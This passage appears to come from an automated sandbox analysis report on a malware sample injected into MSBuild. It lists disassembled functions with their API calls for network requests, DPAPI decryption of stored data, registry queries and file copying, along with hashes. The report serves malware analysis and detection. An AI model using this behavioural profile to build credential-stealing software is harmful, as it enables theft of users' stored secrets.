                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                                            • String ID: PdA$PdA
                                                                                                                                                                                                                                                                            • API String ID: 4198075804-199869184
                                                                                                                                                                                                                                                                            • Opcode ID: 89743936c7e81fd25222ad337d46cbc68b71f87488163e74c6bc97f1d91e7fef
                                                                                                                                                                                                                                                                            • Instruction ID: 58f52d09a55b75ac7dcb790bb2502d5d97770f71d094898c51def8a770c609ef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89743936c7e81fd25222ad337d46cbc68b71f87488163e74c6bc97f1d91e7fef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB416F34800248EECB11DFE5C941BDDBBB5AF19308F50807EE906632D2DB782B48CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00417C10 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 607networksleepCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E33C78), ref: 004188F5
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E33BD8), ref: 0041890D
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E372C0), ref: 00418926
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E37338), ref: 0041893E
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E372D8), ref: 00418956
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E37278), ref: 0041896F
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E30D98), ref: 00418987
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E37308), ref: 0041899F
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E37320), ref: 004189B8
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E37290), ref: 004189D0
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E372A8), ref: 004189E8
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E33C58), ref: 00418A01
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E33A78), ref: 00418A19
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E33998), ref: 00418A31
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E33AB8), ref: 00418A4A
                                                                                                                                                                                                                                                                              • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,00E37128), ref: 00418A62
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417EB0
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417EC7
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410D68
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: GetVolumeInformationA.KERNEL32(00421A29,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410DA1
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DED
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: HeapAlloc.KERNEL32(00000000), ref: 00410DF4
                                                                                                                                                                                                                                                                              • Part of subcall function 00404500: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045CA
                                                                                                                                                                                                                                                                              • Part of subcall function 00404500: StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000000), ref: 004045EA
                                                                                                                                                                                                                                                                              • Part of subcall function 004127A0: StrCmpCA.SHLWAPI(00000000,block,00000000,?,00417F3E), ref: 004127D8
                                                                                                                                                                                                                                                                              • Part of subcall function 004127A0: ExitProcess.KERNEL32 ref: 004127E3
                                                                                                                                                                                                                                                                              • Part of subcall function 00405CE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405DAA
                                                                                                                                                                                                                                                                              • Part of subcall function 00405CE0: StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000000), ref: 00405DCA
                                                                                                                                                                                                                                                                              • Part of subcall function 00412220: strtok_s.MSVCRT ref: 00412260
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 004182B7
                                                                                                                                                                                                                                                                              • Part of subcall function 00405CE0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F54
                                                                                                                                                                                                                                                                              • Part of subcall function 004135C0: strtok_s.MSVCRT ref: 004135FE
                                                                                                                                                                                                                                                                              • Part of subcall function 004135C0: strtok_s.MSVCRT ref: 004136C1
                                                                                                                                                                                                                                                                              • Part of subcall function 00411D10: memset.MSVCRT ref: 00411D4B
                                                                                                                                                                                                                                                                              • Part of subcall function 00405CE0: HttpOpenRequestA.WININET(00000000,00E39900,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 00405F94
                                                                                                                                                                                                                                                                              • Part of subcall function 00405CE0: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405FBB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$Internetlstrcpy$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitHttpInformationOptionRequestSleepVolumeWindowsmemset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3722462685-3916222277
                                                                                                                                                                                                                                                                            • Opcode ID: 12271ea2f4504a68fc960b10ed437e8ad1c9084cbdc0ba69338d80f575c8c776
                                                                                                                                                                                                                                                                            • Instruction ID: af4e92580bc7232f15382c81446c557bbd7ea1f76374bafb1c2556823289d0db
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12271ea2f4504a68fc960b10ed437e8ad1c9084cbdc0ba69338d80f575c8c776
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84329870D00358AACF10EBA5CD46BDDBB75AF19704F5441AEF50873282DB781B48CBA6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CACC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CACC947
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CACC969
                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CACC9A9
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CACC9C8
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CACC9E2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4191843772-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1a4c0aa6113f6a3ff5ce9e0a6111f6b797bbdafbffe53bf25980b634c84ac019
                                                                                                                                                                                                                                                                            • Instruction ID: aee38c62587c56b532d8e8e67f91d8dc2e4fd111d888452f3a48b54106d735c0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a4c0aa6113f6a3ff5ce9e0a6111f6b797bbdafbffe53bf25980b634c84ac019
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58215131741628ABDB15AB68DC88BAE7779FF46708F50051EF90BA7B80DB305C848791
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00410F70 Relevance: 7.6, APIs: 5, Instructions: 70commemoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00427AB4,00000000,00000001,00427260,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?), ref: 00410F8D
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00410F9C
                                                                                                                                                                                                                                                                            • _wtoi64.MSVCRT ref: 00410FE2
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00410FF8
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00410FFB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1817501562-0
                                                                                                                                                                                                                                                                            • Opcode ID: 99efa5cf341d0c5a4f536511f82e5ceebee3ff228c9a1ec95ae9d6f44b693dba
                                                                                                                                                                                                                                                                            • Instruction ID: f339f683a09679795ac17ff9659d8e63658d8b914be92c526fb569d364882cc1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99efa5cf341d0c5a4f536511f82e5ceebee3ff228c9a1ec95ae9d6f44b693dba
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB118175700118AFC720DFA9CC85EAABBB9EFC9704B1081AAF905C7310D675EE42CB60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 004104D0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104E5
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004104EC
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00E306D8,00000000,00020119,00000000), ref: 0041050B
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,00E39238,00000000,00000000,00000000,000000FF), ref: 00410526
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00410530
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3466090806-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                                                                                            • Instruction ID: 676a6382b8ff66aaa777a0d0020f05f931ed1f937911e77e191903498250bf3d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92F04FB9640218FFE710DBA0EC49FAB7B7EEB49B01F005159FB0597240D6705900CBA0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00406AE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0l@$0l@$0l@
                                                                                                                                                                                                                                                                            • API String ID: 0-278002525
                                                                                                                                                                                                                                                                            • Opcode ID: d9fc23f20392344533ef2d983e31f0e7033ca9f6a2f3c0fdbc76c7e886b2572f
                                                                                                                                                                                                                                                                            • Instruction ID: 1a87c9e28315db84159d1825db7685bd73dc57595dfdda9b1935a5cd357ea1c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9fc23f20392344533ef2d983e31f0e7033ca9f6a2f3c0fdbc76c7e886b2572f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 394192B1E002159BEB14DF5AD941AAFB7B8EF84314F01847AEC09A7391E738DD508BA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0040A170 Relevance: 6.3, APIs: 4, Instructions: 282filestringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,00E300C0,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A227
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0040A40B
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0040A41F
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040A4A1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 211194620-0
                                                                                                                                                                                                                                                                            • Opcode ID: 667ad3b203bf6fc85cf3e4c277fb277ffb9b7896b2c50844c84a4a1de004fd4d
                                                                                                                                                                                                                                                                            • Instruction ID: b59fb0c15770b26fa6eb1e59df2b1821273456b1948b1926dc15d3532991443d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 667ad3b203bf6fc85cf3e4c277fb277ffb9b7896b2c50844c84a4a1de004fd4d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4B18070801248EACB14EBE4D955BEDBB79AF29304F54417EE502732D2DB782B0DCBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0040CDE0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                              • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,00E38BE0,?,?,?,?,?,?,?,?,?,?,?,00421750,?), ref: 0040CE4B
                                                                                                                                                                                                                                                                              • Part of subcall function 00406F50: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F77
                                                                                                                                                                                                                                                                              • Part of subcall function 00406F50: LocalAlloc.KERNEL32(00000040,00000000,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F86
                                                                                                                                                                                                                                                                              • Part of subcall function 00406F50: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F9D
                                                                                                                                                                                                                                                                              • Part of subcall function 00406F50: LocalFree.KERNEL32(?,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406FAC
                                                                                                                                                                                                                                                                            • memcmp.MSVCRT ref: 0040CE89
                                                                                                                                                                                                                                                                              • Part of subcall function 00406FD0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FF5
                                                                                                                                                                                                                                                                              • Part of subcall function 00406FD0: LocalAlloc.KERNEL32(00000040,?,?), ref: 0040700D
                                                                                                                                                                                                                                                                              • Part of subcall function 00406FD0: LocalFree.KERNEL32(?), ref: 0040702E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
